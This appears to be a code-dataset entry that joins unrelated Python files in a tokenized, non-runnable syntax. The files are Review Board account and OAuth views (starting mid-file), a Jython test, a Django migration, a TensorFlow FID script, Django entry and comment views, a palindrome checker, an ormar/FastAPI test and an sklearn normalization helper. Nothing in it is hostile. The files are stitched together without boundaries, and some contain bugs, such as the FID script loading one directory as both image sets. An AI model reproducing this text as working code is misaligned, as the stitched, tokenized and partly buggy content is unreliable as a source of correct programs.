UserInfoboxHook.hooks<block_start><try_stmt><block_start>extra_content.append(hook.render(user=user request=self.request local_site=local_site))<block_end><except_stmt>Exception<as>e<block_start>logging.exception('Error when running UserInfoboxHook.'<concat>'render method in extension "%s": %s' hook.extension.id e)<block_end><block_end>review_requests_url=local_site_reverse('user' local_site=local_site args=[username])<line_sep>reviews_url=local_site_reverse('user-grid' local_site=local_site args=[username 'reviews'])<line_sep>has_avatar=(avatar_services.avatars_enabled<and>avatar_services.for_user(user)<is><not><none>)<line_sep><return>{'extra_content':mark_safe(''.join(extra_content)) 'full_name':user.get_full_name() 'has_avatar':has_avatar 'infobox_user':user 'review_requests_url':review_requests_url 'reviews_url':reviews_url 'show_profile':self._show_profile 'timezone':self._timezone }<block_end><block_end>@csrf_protect<def_stmt>account_register request next_url='dashboard'<block_start>"""Display the appropriate registration page. If registration is enabled and the selected authentication backend supports creation of users, this will return the appropriate registration page. If registration is not supported, this will redirect to the login view. """<line_sep>siteconfig=SiteConfiguration.objects.get_current()<line_sep>auth_backends=get_enabled_auth_backends()<if_stmt>(auth_backends[0].supports_registration<and>siteconfig.get('auth_enable_registration')<and><not>siteconfig.get('site_read_only'))<block_start>response=register(request next_page=reverse(next_url) form_class=RegistrationForm)<line_sep><return>response<block_end><return>HttpResponseRedirect(reverse("login"))<block_end><class_stmt>MyAccountView(ConfigPagesView)<block_start>"""Displays the My Account page containing user preferences. 
The page will be built based on registered pages and forms. This makes it easy to plug in new bits of UI for the page, which is handy for extensions that want to offer customization for users. """<line_sep>title=_('My Account')<line_sep>css_bundle_names=['account-page' ]<line_sep>js_bundle_names=['3rdparty-jsonlint' 'config-forms' 'account-page' ]<line_sep>@method_decorator(login_required)@method_decorator(check_read_only)@augment_method_from(ConfigPagesView)<def_stmt>dispatch self *args **kwargs<block_start>"""Handle the view. This just falls back to the djblets ConfigPagesView.dispatch implementation. """<line_sep><pass><block_end>@property<def_stmt>nav_title self<block_start>"""Get the title for the navigation section."""<line_sep><return>self.request.user.username<block_end>@property<def_stmt>page_classes self<block_start>"""The list of page classes for this view. If the user is missing any consent requirements or has not accepted the privacy policy/terms of service, only the privacy page will be shown. """<if_stmt>self.is_user_missing_consent<block_start><return>[AccountPage.registry.get('page_id' PrivacyPage.page_id)]<block_end><return>list(AccountPage.registry)<block_end>@cached_property<def_stmt>ordered_user_local_sites self<block_start>"""Get the user's local sites, ordered by name."""<line_sep><return>self.request.user.local_site.order_by('name')<block_end>@property<def_stmt>render_sidebar self<block_start>"""Whether or not to render the sidebar. If the user is missing any consent requirements or has not accepted the privacy policy/terms of service, the sidebar will not render. This is to prevent the user from navigating away from the privacy page before making decisions. """<line_sep><return><not>self.is_user_missing_consent<block_end>@cached_property<def_stmt>is_user_missing_consent self<block_start>"""Whether or not the user is missing consent."""<line_sep><return>is_consent_missing(self.request.user)<block_end><block_end>@login_required@preview_email(prepare_password_changed_mail)<def_stmt>preview_password_changed_email request<block_start><return>{'user':request.user }<block_end>@login_required@feature_required(oauth2_service_feature)<def_stmt>edit_oauth_app request app_id=<none><block_start>"""Create or edit an OAuth2 application. Args: request (django.http.HttpRequest): The current HTTP request. app_id (int, optional): The ID of the application to edit. If this argument is ``None`` a new application will be edited. Returns: django.http.HttpResponse: The rendered view. """<line_sep># If we import this at global scope, it will cause issues with admin sites # being automatically registered. 
<import_from_stmt>reviewboard.oauth.admin ApplicationAdmin<if_stmt>app_id<block_start>app=get_object_or_404(Application pk=app_id user=request.user )<line_sep>form_cls=UserApplicationChangeForm<line_sep>fieldsets=ApplicationAdmin.fieldsets<block_end><else_stmt><block_start>app=<none><line_sep>form_cls=UserApplicationCreationForm<line_sep>fieldsets=ApplicationAdmin.add_fieldsets<block_end><if_stmt>request.method<eq>'POST'<block_start>form_data=request.POST.copy()<line_sep>form=form_cls(user=request.user data=form_data initial=<none> instance=app)<if_stmt>form.is_valid()<block_start>app=form.save()<if_stmt>app_id<is><not><none><block_start>next_url=OAuth2Page.get_absolute_url()<block_end><else_stmt><block_start>next_url=reverse('edit-oauth-app' args=(app.pk ))<block_end><return>HttpResponseRedirect(next_url)<block_end><block_end><else_stmt><block_start>form=form_cls(user=request.user data=<none> initial=<none> instance=app)<line_sep># Show a warning at the top of the form when the form is disabled for # security. # # We don't need to worry about full_clean not being called (which would # be if we went through form.errors) because this form will never be # saved. <if_stmt>app<and>app.is_disabled_for_security<block_start>form._errors=ErrorDict({'__all__':form.error_class([form.DISABLED_FOR_SECURITY_ERROR] ) })<block_end><block_end><return>render(request=request template_name='accounts/edit_oauth_app.html' context={'app':app 'form':form 'fieldsets':filter_fieldsets(form=form_cls fieldsets=fieldsets) 'oauth2_page_url':OAuth2Page.get_absolute_url() 'request':request })<block_end>
# Test case for PR#183; print of a recursive PyStringMap causes a JVM stack # overflow. g=globals()<line_sep>print(g)<line_sep>
expected_output={'current-eta-records':0 'excess-packets-received':60 'excess-syn-received':0 'total-eta-fnf':2 'total-eta-idp':2 'total-eta-records':4 'total-eta-splt':2 'total-packets-out-of-order':0 'total-packets-received':80 'total-packets-retransmitted':0}<line_sep>
# -*- coding: utf-8 -*- <import_from_future_stmt> unicode_literals<import_stmt>logging<import_from_stmt>django.db models migrations<line_sep>logging.basicConfig(format="%(asctime)-15s %(message)s")<line_sep>logger=logging.getLogger(__file__)<line_sep>logger.setLevel(logging.INFO)<line_sep>BULK_SIZE=2500<def_stmt>move_metadata apps schema_editor<block_start>IEDocument=apps.get_model('corpus' 'IEDocument')<line_sep>IEDocumentMetadata=apps.get_model('corpus' 'IEDocumentMetadata')<line_sep>documents=IEDocument.objects.all()<line_sep>total=documents.count()<line_sep>objects_to_create=[]<line_sep>logger.info("Creating missing documents metadata objects")<for_stmt>i,document enumerate(documents.iterator())<block_start><if_stmt>i%BULK_SIZE<eq>0<block_start>logger.info("Created {} out of {}".format(i total))<if_stmt>objects_to_create<block_start>IEDocumentMetadata.objects.bulk_create(objects_to_create)<line_sep>objects_to_create=[]<block_end><block_end>objects_to_create.append(IEDocumentMetadata(title=document.title url=document.url items=document.metadata document_tmp=document))<block_end><if_stmt>objects_to_create<block_start>logger.info("Created {} out of {}".format(i+1 total))<line_sep>IEDocumentMetadata.objects.bulk_create(objects_to_create)<block_end>logger.info("Updating documents to point to their metadata objects")<line_sep>doc_mtds=IEDocumentMetadata.objects.filter(document_tmp__metadata_fk__isnull=<true>)<line_sep>total=doc_mtds.count()<for_stmt>i,doc_mtd enumerate(doc_mtds)<block_start><if_stmt>i%BULK_SIZE<eq>0<block_start>logger.info("Updated {} out of {}".format(i total))<block_end>IEDocument.objects.filter(pk=doc_mtd.document_tmp_id).update(metadata_fk=doc_mtd.id)<block_end>logger.info("Updated {} out of {}".format(total total))<block_end><class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('corpus' '0013_create_metadata_model') ]<line_sep>operations=[migrations.RunPython(move_metadata) ]<block_end>
<import_from_future_stmt> absolute_import division print_function<import_stmt>torch<import_stmt>warnings<import_from_stmt>tqdm tqdm<import_stmt>pathlib<import_from_stmt>scipy linalg<import_stmt>tensorflow<as>tf<import_stmt>numpy<as>np<import_stmt>os<line_sep>os.environ['TF_CPP_MIN_LOG_LEVEL']='2'<def_stmt>check_or_download_inception inception_path<block_start>''' Checks if the path to the inception file is valid, or downloads the file if it is not present. '''<line_sep>INCEPTION_URL='http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz'<if_stmt>inception_path<is><none><block_start>inception_path='/tmp'<block_end>inception_path=pathlib.Path(inception_path)<line_sep>model_file=inception_path/'classify_image_graph_def.pb'<if_stmt><not>model_file.exists()<block_start>print("Downloading Inception model")<import_from_stmt>urllib request<import_stmt>tarfile<line_sep>fn,_=request.urlretrieve(INCEPTION_URL)<with_stmt>tarfile.open(fn mode='r')<as>f<block_start>f.extract('classify_image_graph_def.pb' str(model_file.parent))<block_end><block_end><return>str(model_file)<block_end><def_stmt>create_inception_graph pth<block_start>"""Creates a graph from saved GraphDef file."""<line_sep># Creates graph from saved graph_def.pb. <with_stmt>tf.io.gfile.GFile(pth 'rb')<as>f<block_start>graph_def=tf.compat.v1.GraphDef()<line_sep>graph_def.ParseFromString(f.read())<line_sep>_=tf.import_graph_def(graph_def name='FID_Inception_Net')<block_end><block_end><def_stmt>calculate_activation_statistics images sess batch_size=50 verbose=<false><block_start>"""Calculation of the statistics used by the FID. Params: -- images : Numpy array of dimension (n_images, hi, wi, 3). The values must lie between 0 and 255. -- sess : current session -- batch_size : the images numpy array is split into batches with batch size batch_size. A reasonable batch size depends on the available hardware. -- verbose : If set to True and parameter out_step is given, the number of calculated batches is reported. Returns: -- mu : The mean over samples of the activations of the pool_3 layer of the incption model. -- sigma : The covariance matrix of the activations of the pool_3 layer of the incption model. """<line_sep>act=get_activations(images sess batch_size verbose)<line_sep>mu=np.mean(act axis=0)<line_sep>sigma=np.cov(act rowvar=<false>)<line_sep><return>mu sigma<block_end># code for handling inception net derived from # https://github.com/openai/improved-gan/blob/master/inception_score/model.py <def_stmt>_get_inception_layer sess<block_start>"""Prepares inception net for batched usage and returns pool_3 layer. """<line_sep>layername='FID_Inception_Net/pool_3:0'<line_sep>pool3=sess.graph.get_tensor_by_name(layername)<line_sep>ops=pool3.graph.get_operations()<for_stmt>op_idx,op enumerate(ops)<block_start><for_stmt>o op.outputs<block_start>shape=o.get_shape()<if_stmt>shape._dims<ne>[]<block_start>shape=[s.value<for>s shape]<line_sep>new_shape=[]<for_stmt>j,s enumerate(shape)<block_start><if_stmt>s<eq>1<and>j<eq>0<block_start>new_shape.append(<none>)<block_end><else_stmt><block_start>new_shape.append(s)<block_end><block_end>o.__dict__['_shape_val']=tf.TensorShape(new_shape)<block_end><block_end><block_end><return>pool3<block_end># ------------------------------------------------------------------------------- <def_stmt>get_activations images sess batch_size=200 verbose=<false><block_start>"""Calculates the activations of the pool_3 layer for all images. Params: -- images : Numpy array of dimension (n_images, hi, wi, 3). 
The values must lie between 0 and 256. -- sess : current session -- batch_size : the images numpy array is split into batches with batch size batch_size. A reasonable batch size depends on the available hardware. -- verbose : If set to True and parameter out_step is given, the number of calculated batches is reported. Returns: -- A numpy array of dimension (num images, 2048) that contains the activations of the given tensor when feeding inception with the query tensor. """<line_sep>inception_layer=_get_inception_layer(sess)<line_sep>n_images=images.shape[0]<if_stmt>batch_size<g>n_images<block_start>print("warning: batch size is bigger than the data size. setting batch size to data size")<line_sep>batch_size=n_images<block_end>n_batches=n_images<floordiv>batch_size<line_sep>pred_arr=np.empty((n_images 2048))<for_stmt>i tqdm(range(n_batches))<block_start><if_stmt>verbose<block_start>print("\rPropagating batch %d/%d"%(i+1 n_batches) end="" flush=<true>)<block_end>start=i<times>batch_size<if_stmt>start+batch_size<l>n_images<block_start>end=start+batch_size<block_end><else_stmt><block_start>end=n_images<block_end>batch=images[start:end]<line_sep>pred=sess.run(inception_layer {'FID_Inception_Net/ExpandDims:0':batch})<line_sep>pred_arr[start:end]=pred.reshape(batch_size -1)<block_end><if_stmt>verbose<block_start>print(" done")<block_end><return>pred_arr<block_end># ------------------------------------------------------------------------------- <def_stmt>calculate_frechet_distance mu1 sigma1 mu2 sigma2 eps=1e-6<block_start>"""Numpy implementation of the Frechet Distance. The Frechet distance between two multivariate Gaussians X_1 ~ N(mu_1, C_1) and X_2 ~ N(mu_2, C_2) is d^2 = ||mu_1 - mu_2||^2 + Tr(C_1 + C_2 - 2*sqrt(C_1*C_2)). Stable version by <NAME>. Params: -- mu1 : Numpy array containing the activations of the pool_3 layer of the inception net ( like returned by the function 'get_predictions') for generated samples. -- mu2 : The sample mean over activations of the pool_3 layer, precalculated on a representative data set. -- sigma1: The covariance matrix over activations of the pool_3 layer for generated samples. -- sigma2: The covariance matrix over activations of the pool_3 layer, precalculated on a representative data set. Returns: -- : The Frechet Distance. 
"""<line_sep>mu1=np.atleast_1d(mu1)<line_sep>mu2=np.atleast_1d(mu2)<line_sep>sigma1=np.atleast_2d(sigma1)<line_sep>sigma2=np.atleast_2d(sigma2)<assert_stmt>mu1.shape<eq>mu2.shape "Training and test mean vectors have different lengths"<assert_stmt>sigma1.shape<eq>sigma2.shape "Training and test covariances have different dimensions"<line_sep>diff=mu1-mu2<line_sep># product might be almost singular covmean,_=linalg.sqrtm(sigma1.dot(sigma2) disp=<false>)<if_stmt><not>np.isfinite(covmean).all()<block_start>msg="fid calculation produces singular product; adding %s to diagonal of cov estimates"%eps<line_sep>warnings.warn(msg)<line_sep>offset=np.eye(sigma1.shape[0])<times>eps<line_sep>covmean=linalg.sqrtm((sigma1+offset).dot(sigma2+offset))<block_end># numerical error might give slight imaginary component <if_stmt>np.iscomplexobj(covmean)<block_start><if_stmt><not>np.allclose(np.diagonal(covmean).imag 0 atol=1e-3)<block_start>m=np.max(np.abs(covmean.imag))<line_sep><raise>ValueError("Imaginary component {}".format(m))<block_end>covmean=covmean.real<block_end>tr_covmean=np.trace(covmean)<line_sep><return>diff.dot(diff)+np.trace(sigma1)+np.trace(sigma2)-2<times>tr_covmean<block_end><def_stmt>pt_to_np imgs<block_start>'''normalizes pytorch image in [-1, 1] to [0, 255]'''<line_sep>normalized=[((img/2+0.5)<times>255).clamp(0 255)<for>img imgs]<line_sep><return>np.array([img.permute(1 2 0).numpy()<for>img normalized])<block_end><def_stmt>compute_fid_given_images fake_images real_images<block_start>'''requires that the image batches are numpy format, normalized to 0, 255'''<line_sep>inception_path=check_or_download_inception(<none>)<line_sep>create_inception_graph(inception_path)<with_stmt>tf.Session()<as>sess<block_start>sess.run(tf.global_variables_initializer())<if_stmt>isinstance(fake_images tuple)<block_start>m1,s1=fake_images<block_end><else_stmt><block_start>m1,s1=calculate_activation_statistics(fake_images sess)<block_end><if_stmt>isinstance(real_images tuple)<block_start>m2,s2=real_images<block_end><else_stmt><block_start>m2,s2=calculate_activation_statistics(real_images sess)<block_end><block_end><return>calculate_frechet_distance(m1 s1 m2 s2)<block_end><def_stmt>compute_fid_given_path path<block_start><with_stmt>np.load(path)<as>data<block_start>fake_imgs=data['fake']<line_sep>real_imgs=data['real']<block_end><return>compute_fid_given_images(fake_imgs real_imgs)<block_end><def_stmt>load_from_path source<block_start>root='/data/vision/torralba/ganprojects/placesgan/tracer/utils/fid_stats/'<line_sep>path=os.path.join(root f'{source}_stats.npz')<if_stmt>os.path.exists(path)<block_start>print('Loading statistics from ' path)<with_stmt>np.load(path)<as>data<block_start><return>data['m'] data['s']<block_end><block_end><else_stmt><block_start>print("Stats not found in path" path)<line_sep>exit()<block_end><block_end><def_stmt>compute_fid source1 source2<block_start><if_stmt>isinstance(source1 str)<block_start>source1=load_from_path(source1)<block_end><if_stmt>isinstance(source1 torch.Tensor)<block_start>source1=pt_to_np(source1)<block_end><if_stmt>isinstance(source2 str)<block_start>source2=load_from_path(source2)<block_end><if_stmt>isinstance(source2 torch.Tensor)<block_start>source2=pt_to_np(source2)<block_end><return>compute_fid_given_images(source1 source2)<block_end><if_stmt>__name__<eq>'__main__'<block_start><import_stmt>argparse<import_from_stmt>PIL Image<import_from_stmt>torchvision 
transforms<line_sep>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--source')<line_sep>parser.add_argument('--target')<line_sep>args=parser.parse_args()<line_sep>transform=transforms.Compose([transforms.Resize((224 224)) transforms.ToTensor() transforms.Normalize((0.5 0.5 0.5) (0.5 0.5 0.5)) ])<line_sep>images1=[]<for_stmt>file_name tqdm(os.listdir(args.source))<block_start><if_stmt>file_name.lower().endswith(('.png' 'jpeg' '.jpg'))<block_start>path=os.path.join(args.source file_name)<line_sep>images1.append(transform(Image.open(path).convert('RGB')))<block_end><block_end>images1=torch.stack(images1)<line_sep>images2=[]<for_stmt>file_name tqdm(os.listdir(args.source))<block_start><if_stmt>file_name.lower().endswith(('.png' 'jpeg' '.jpg'))<block_start>path=os.path.join(args.source file_name)<line_sep>images2.append(transform(Image.open(path).convert('RGB')))<block_end><block_end>images2=torch.stack(images2)<line_sep>result=compute_fid(images1 images2)<line_sep>print(result)<with_stmt>open('fid_results.txt' 'a+')<as>f<block_start>f.write(args.source+args.target+':\n')<line_sep>f.write(str(result)+'\n')<block_end><block_end>
<import_from_stmt>django.contrib messages<as>notifications<import_from_stmt>django.contrib.auth.mixins LoginRequiredMixin<import_from_stmt>django.contrib.messages.views SuccessMessageMixin<import_from_stmt>django.db.models F Q<import_from_stmt>django.db.models.functions Coalesce<import_from_stmt>django.http Http404<import_from_stmt>django.shortcuts get_object_or_404 redirect<import_from_stmt>django.urls reverse reverse_lazy<import_from_stmt>django.utils timezone<import_from_stmt>django.utils.translation gettext gettext_lazy<as>_<import_from_stmt>django.views.generic CreateView FormView UpdateView<import_from_stmt>dictionary.forms.edit EntryForm PreferencesForm<import_from_stmt>dictionary.models Author Comment Entry Topic<import_from_stmt>dictionary.utils time_threshold<class_stmt>UserPreferences(LoginRequiredMixin SuccessMessageMixin UpdateView)<block_start>model=Author<line_sep>form_class=PreferencesForm<line_sep>template_name="dictionary/user/preferences/index.html"<line_sep>success_message=_("settings are saved, dear")<line_sep>success_url=reverse_lazy("user_preferences")<def_stmt>get_object self queryset=<none><block_start><return>self.request.user<block_end><def_stmt>form_invalid self form<block_start>notifications.error(self.request gettext("we couldn't handle your request. try again later."))<line_sep><return>super().form_invalid(form)<block_end><block_end><class_stmt>EntryCreateMixin<block_start>model=Entry<line_sep>form_class=EntryForm<def_stmt>form_valid self form<block_start>""" User sent new entry, whose topic may or may not be existent. If topic exists, adds the entry and redirects to the entry permalink, otherwise the topic is created if the title is valid. Entry.save() sets created_by field of the topic. """<line_sep>draft_pk=self.request.POST.get("pub_draft_pk" "")<line_sep>publishing_draft=draft_pk.isdigit()<if_stmt>(<not>publishing_draft)<and>(self.topic.exists<and>self.topic.is_banned)# Cannot check is_banned before checking its existence. <block_start>notifications.error(self.request _("we couldn't handle your request. try again later."))<line_sep><return>self.form_invalid(form)<block_end>status=self.request.user.entry_publishable_status<if_stmt>status<is><not><none><block_start>notifications.error(self.request status extra_tags="persistent")<if_stmt>publishing_draft<block_start><return>redirect(reverse("entry_update" kwargs={"pk":int(draft_pk)}))<block_end><return>self.form_invalid(form)<block_end><if_stmt>publishing_draft<block_start><try_stmt><block_start>entry=Entry.objects_all.get(pk=int(draft_pk) is_draft=<true> author=self.request.user topic__is_banned=<false>)<line_sep>entry.content=form.cleaned_data["content"]<line_sep>entry.is_draft=<false><line_sep>entry.date_created=timezone.now()<line_sep>entry.date_edited=<none><block_end><except_stmt>Entry.DoesNotExist<block_start>notifications.error(self.request _("we couldn't handle your request. try again later."))<line_sep><return>self.form_invalid(form)<block_end><block_end><else_stmt># Creating a brand new entry. 
<block_start>entry=form.save(commit=<false>)<line_sep>entry.author=self.request.user<if_stmt>self.topic.exists<block_start>entry.topic=self.topic<block_end><else_stmt><block_start><if_stmt><not>self.topic.valid<block_start>notifications.error(self.request _("curses to such a topic anyway.") extra_tags="persistent")<line_sep><return>self.form_invalid(form)<block_end>entry.topic=Topic.objects.create_topic(title=self.topic.title)<block_end><block_end>entry.save()<line_sep>notifications.info(self.request _("the entry was successfully launched into stratosphere"))<line_sep><return>redirect(reverse("entry-permalink" kwargs={"entry_id":entry.id}))<block_end><def_stmt>form_invalid self form<block_start><if_stmt>form.errors<block_start><for_stmt>err form.errors["content"]<block_start>notifications.error(self.request err extra_tags="persistent")<block_end><block_end><return>super().form_invalid(form)<block_end><block_end><class_stmt>EntryCreate(LoginRequiredMixin EntryCreateMixin FormView)<block_start>template_name="dictionary/edit/entry_create.html"<def_stmt>dispatch self request *args **kwargs<block_start>self.extra_context={"title":self.request.POST.get("title" "")}<line_sep><return>super().dispatch(request *args **kwargs)<block_end><def_stmt>get_context_data self **kwargs<block_start>context=super().get_context_data(**kwargs)<line_sep>context["recent_drafts"]=(Entry.objects_all.filter(Q(date_created__gte=time_threshold(hours=24))|Q(date_edited__gte=time_threshold(hours=24)) is_draft=<true> author=self.request.user ).select_related("topic").only("topic__title" "date_created" "date_edited").alias(last_edited=Coalesce(F("date_edited") F("date_created"))).order_by("-last_edited")[:5])<line_sep><return>context<block_end><def_stmt>form_valid self form<block_start><if_stmt><not>self.request.POST.get("pub_draft_pk" "").isdigit()# Topic object is only required if not publishing a draft. 
<block_start>self.topic=Topic.objects.get_or_pseudo(unicode_string=self.extra_context.get("title"))# noqa <block_end><return>super().form_valid(form)<block_end><block_end><class_stmt>EntryUpdate(LoginRequiredMixin UpdateView)<block_start>model=Entry<line_sep>form_class=EntryForm<line_sep>template_name="dictionary/edit/entry_update.html"<line_sep>context_object_name="entry"<def_stmt>form_valid self form<block_start>entry=form.save(commit=<false>)<if_stmt>self.request.user.is_suspended<or>entry.topic.is_banned<block_start>notifications.error(self.request gettext("you lack the required permissions."))<line_sep><return>super().form_invalid(form)<block_end><if_stmt>entry.is_draft<block_start>status=self.request.user.entry_publishable_status<if_stmt>status<is><not><none><block_start>notifications.error(self.request status extra_tags="persistent")<line_sep><return>super().form_invalid(form)<block_end>entry.is_draft=<false><line_sep>entry.date_created=timezone.now()<line_sep>entry.date_edited=<none><line_sep>notifications.info(self.request gettext("the entry was successfully launched into stratosphere"))<block_end><else_stmt><block_start>entry.date_edited=timezone.now()<block_end><return>super().form_valid(form)<block_end><def_stmt>form_invalid self form<block_start><for_stmt>error form.errors["content"]<block_start>notifications.error(self.request error)<block_end><return>super().form_invalid(form)<block_end><def_stmt>get_queryset self<block_start><return>Entry.objects_all.filter(author=self.request.user)<block_end><block_end><class_stmt>CommentMixin(LoginRequiredMixin SuccessMessageMixin)<block_start>model=Comment<line_sep>fields=("content" )<line_sep>template_name="dictionary/edit/comment_form.html"<def_stmt>form_invalid self form<block_start><for_stmt>error form.errors["content"]<block_start>notifications.error(self.request error)<block_end><return>super().form_invalid(form)<block_end><block_end><class_stmt>CommentCreate(CommentMixin CreateView)<block_start>success_message=_("the comment was successfully launched into stratosphere")<line_sep>entry=<none><def_stmt>dispatch self request *args **kwargs<block_start>self.entry=get_object_or_404(Entry.objects_published pk=self.kwargs.get("pk"))<if_stmt><not>(request.user.has_perm("dictionary.can_comment")<and>self.entry.topic.is_ama<and>request.user.is_accessible)<block_start><raise>Http404<block_end><return>super().dispatch(request *args **kwargs)<block_end><def_stmt>get_context_data self **kwargs<block_start>context=super().get_context_data(**kwargs)<line_sep>context["entry"]=self.entry<line_sep><return>context<block_end><def_stmt>form_valid self form<block_start>comment=form.save(commit=<false>)<line_sep>comment.author=self.request.user<line_sep>comment.entry=self.entry<line_sep>comment.save()<line_sep><return>super().form_valid(form)<block_end><block_end><class_stmt>CommentUpdate(CommentMixin UpdateView)<block_start>success_message=_("the comment has been updated")<def_stmt>get_object self queryset=<none><block_start><return>get_object_or_404(Comment pk=self.kwargs.get(self.pk_url_kwarg) author=self.request.user)<block_end><def_stmt>form_valid self form<block_start><if_stmt>self.request.POST.get("delete")<block_start>self.object.delete()<line_sep>notifications.success(self.request gettext("the comment has been deleted"))<line_sep><return>redirect(self.object.entry.get_absolute_url())<block_end><if_stmt><not>self.request.user.is_accessible<block_start>notifications.error(self.request gettext("you lack the permissions to edit this comment. 
you might as well delete it?"))<line_sep><return>self.form_invalid(form)<block_end>comment=form.save(commit=<false>)<line_sep>comment.date_edited=timezone.now()<line_sep><return>super().form_valid(form)<block_end><def_stmt>get_context_data self **kwargs<block_start>context=super().get_context_data(**kwargs)<line_sep>context["entry"]=self.object.entry<line_sep>context["updating"]=<true><line_sep><return>context<block_end><block_end>
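# A hypothetical urls.py wiring for the views above; the route strings and the module path are illustrative assumptions -- only the view classes and the "user_preferences"/"entry_update" names used in reverse() come from the code. <import_from_stmt>django.urls path<import_from_stmt>dictionary.views.edit CommentCreate CommentUpdate EntryCreate EntryUpdate UserPreferences<line_sep>urlpatterns=[path("settings/" UserPreferences.as_view() name="user_preferences") path("entry/create/" EntryCreate.as_view() name="entry_create") path("entry/update/<int:pk>/" EntryUpdate.as_view() name="entry_update") path("entry/<int:pk>/comment/" CommentCreate.as_view() name="comment_create") path("comment/<int:pk>/update/" CommentUpdate.as_view() name="comment_update")]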
<def_stmt>isPalindrome text# a string is a palindrome when it equals its reverse <block_start><return>text<eq>text[::-1]<block_end>print("Please enter a string: ")<line_sep>x=input()<line_sep>flag=isPalindrome(x)<if_stmt>flag<block_start>print(x "is a Palindrome")<block_end><else_stmt><block_start>print(x "is NOT a Palindrome")<block_end>
<import_stmt>asyncio<import_from_stmt>typing List Optional<import_stmt>databases<import_stmt>pytest<import_stmt>sqlalchemy<import_from_stmt>fastapi FastAPI<import_from_stmt>starlette.testclient TestClient<import_stmt>ormar<import_from_stmt>tests.settings DATABASE_URL<line_sep>app=FastAPI()<line_sep>metadata=sqlalchemy.MetaData()<line_sep>database=databases.Database(DATABASE_URL force_rollback=<true>)<line_sep>app.state.database=database<line_sep>@app.on_event("startup")<async_keyword><def_stmt>startup <arrow><none><block_start>database_=app.state.database<if_stmt><not>database_.is_connected<block_start><await>database_.connect()<block_end><block_end>@app.on_event("shutdown")<async_keyword><def_stmt>shutdown <arrow><none><block_start>database_=app.state.database<if_stmt>database_.is_connected<block_start><await>database_.disconnect()<block_end><block_end><class_stmt>Category(ormar.Model)<block_start><class_stmt>Meta<block_start>tablename="categories"<line_sep>metadata=metadata<line_sep>database=database<block_end>id:int=ormar.Integer(primary_key=<true>)<line_sep>name:str=ormar.String(max_length=100)<block_end><class_stmt>Item(ormar.Model)<block_start><class_stmt>Meta<block_start>tablename="items"<line_sep>metadata=metadata<line_sep>database=database<block_end>id:int=ormar.Integer(primary_key=<true>)<line_sep>name:str=ormar.String(max_length=100)<line_sep>category:Optional[Category]=ormar.ForeignKey(Category nullable=<true>)<block_end>@pytest.fixture(autouse=<true> scope="module")<def_stmt>create_test_database <block_start>engine=sqlalchemy.create_engine(DATABASE_URL)<line_sep>metadata.create_all(engine)<line_sep><yield><line_sep>metadata.drop_all(engine)<block_end>@app.get("/items/" response_model=List[Item])<async_keyword><def_stmt>get_items <block_start>items=<await>Item.objects.select_related("category").all()<line_sep><return>items<block_end>@app.get("/items/raw/" response_model=List[Item])<async_keyword><def_stmt>get_raw_items <block_start>items=<await>Item.objects.all()<line_sep><return>items<block_end>@app.post("/items/" response_model=Item)<async_keyword><def_stmt>create_item item:Item<block_start><await>item.save()<line_sep><return>item<block_end>@app.post("/categories/" response_model=Category)<async_keyword><def_stmt>create_category category:Category<block_start><await>category.save()<line_sep><return>category<block_end>@app.get("/items/{item_id}")<async_keyword><def_stmt>get_item item_id:int<block_start>item=<await>Item.objects.get(pk=item_id)<line_sep><return>item<block_end>@app.put("/items/{item_id}")<async_keyword><def_stmt>update_item item_id:int item:Item<block_start>item_db=<await>Item.objects.get(pk=item_id)<line_sep><return><await>item_db.update(**item.dict())<block_end>@app.delete("/items/{item_id}")<async_keyword><def_stmt>delete_item item_id:int item:Item=<none><block_start><if_stmt>item<block_start><return>{"deleted_rows":<await>item.delete()}<block_end>item_db=<await>Item.objects.get(pk=item_id)<line_sep><return>{"deleted_rows":<await>item_db.delete()}<block_end><def_stmt>test_all_endpoints <block_start>client=TestClient(app)<with_stmt>client<as>client<block_start>response=client.post("/categories/" json={"name":"test cat"})<line_sep>category=response.json()<line_sep>response=client.post("/items/" json={"name":"test" "id":1 "category":category})<line_sep>item=Item(**response.json())<assert_stmt>item.pk<is><not><none><line_sep>response=client.get("/items/")<line_sep>items=[Item(**item)<for>item response.json()]<assert_stmt>items[0]<eq>item<line_sep>item.name="New 
name"<line_sep>response=client.put(f"/items/{item.pk}" json=item.dict())<assert_stmt>response.json()<eq>item.dict()<line_sep>response=client.get("/items/")<line_sep>items=[Item(**item)<for>item response.json()]<assert_stmt>items[0].name<eq>"New name"<line_sep>response=client.get("/items/raw/")<line_sep>items=[Item(**item)<for>item response.json()]<assert_stmt>items[0].name<eq>"New name"<assert_stmt>items[0].category.name<is><none><line_sep>response=client.get(f"/items/{item.pk}")<line_sep>new_item=Item(**response.json())<assert_stmt>new_item<eq>item<line_sep>response=client.delete(f"/items/{item.pk}")<assert_stmt>response.json().get("deleted_rows" "__UNDEFINED__")<ne>"__UNDEFINED__"<line_sep>response=client.get("/items/")<line_sep>items=response.json()<assert_stmt>len(items)<eq>0<line_sep>client.post("/items/" json={"name":"test_2" "id":2 "category":category})<line_sep>response=client.get("/items/")<line_sep>items=response.json()<assert_stmt>len(items)<eq>1<line_sep>item=Item(**items[0])<line_sep>response=client.delete(f"/items/{item.pk}" json=item.dict())<assert_stmt>response.json().get("deleted_rows" "__UNDEFINED__")<ne>"__UNDEFINED__"<line_sep>response=client.get("/docs/")<assert_stmt>response.status_code<eq>200<block_end><block_end>
#! /usr/bin/python ''' Data Normalization '''<import_from_stmt>sklearn preprocessing<def_stmt>normalize file_dataframe cols<block_start>''' L2-normalize the given columns and return the dataframe. '''<for_stmt>col cols# preprocessing.normalize needs a 2-D array and returns the result rather than working in place, so reshape the column and write it back <block_start>file_dataframe[col]=preprocessing.normalize(file_dataframe[col].values.reshape(1 -1) norm='l2')[0]<block_end><return>file_dataframe<block_end>
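# A minimal usage sketch, assuming a pandas DataFrame with numeric columns; the column names and values are illustrative. <import_stmt>pandas<as>pd<line_sep>df=pd.DataFrame({'height':[1.0 2.0 2.0] 'weight':[3.0 0.0 4.0]})<line_sep>df=normalize(df ['height' 'weight'])<line_sep>print(df)# each listed column now has unit L2 norm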
